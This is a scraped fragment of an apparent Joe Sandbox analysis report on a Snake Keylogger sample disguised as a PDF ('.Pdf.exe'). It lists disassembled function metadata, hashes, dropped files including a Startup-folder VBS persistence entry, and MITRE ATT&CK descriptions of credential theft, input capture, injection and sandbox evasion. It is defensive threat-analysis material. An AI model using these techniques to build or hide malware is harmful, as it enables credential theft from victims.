Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 8c8797d6a362440a0419967fd01e07503b2e236a87426c6dda1cd3030a40ffc1
Instruction ID: 8d2d6177992e6fd0c0fb22a2bdef0fdbe4ee07d8e103b9acc718fde4e001c2c5
Opcode Fuzzy Hash: 8c8797d6a362440a0419967fd01e07503b2e236a87426c6dda1cd3030a40ffc1
Instruction Fuzzy Hash: 97D01231384318BBE36867B0AC0FFCA7A18AB44B11F110919B78DAA1D1C9E1E980CB64

Function 000E86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000E86E2
PostMessageW.USER32(00000000), ref: 000E86E9

Part of subcall function 000C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C7AD0

Strings

Shell_TrayWnd, xrefs: 000E86DB

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: efe94511ea8e309e1e5b740ef9e98cdf0319a5107ebf1dbe6cb62071b38cbb78
Instruction ID: 04b237b72c936b9d205e5dc90f351ab7e15f6537e54f75a2c37766a133d75ca9
Opcode Fuzzy Hash: efe94511ea8e309e1e5b740ef9e98cdf0319a5107ebf1dbe6cb62071b38cbb78
Instruction Fuzzy Hash: 0DD012313853187BF36867B0AC0FFCA7A18AB44B11F110919B789EA1D1C9E1E980CB69

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IMG-20241119-WA0006(162KB).Pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut3143.tmp

C:\Users\user\AppData\Local\Temp\autF9F7.tmp

C:\Users\user\AppData\Local\Temp\autFB.tmp

C:\Users\user\AppData\Local\Temp\scroll

C:\Users\user\AppData\Local\Wausaukee\silvexes.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\silvexes.vbs

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
IMG-20241119-WA0006(162KB).Pdf.exe

Function 000AB043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00083D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Function 0009DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 0008406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 000CFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Function 00083F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 000CBFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Function 00083742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00083E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre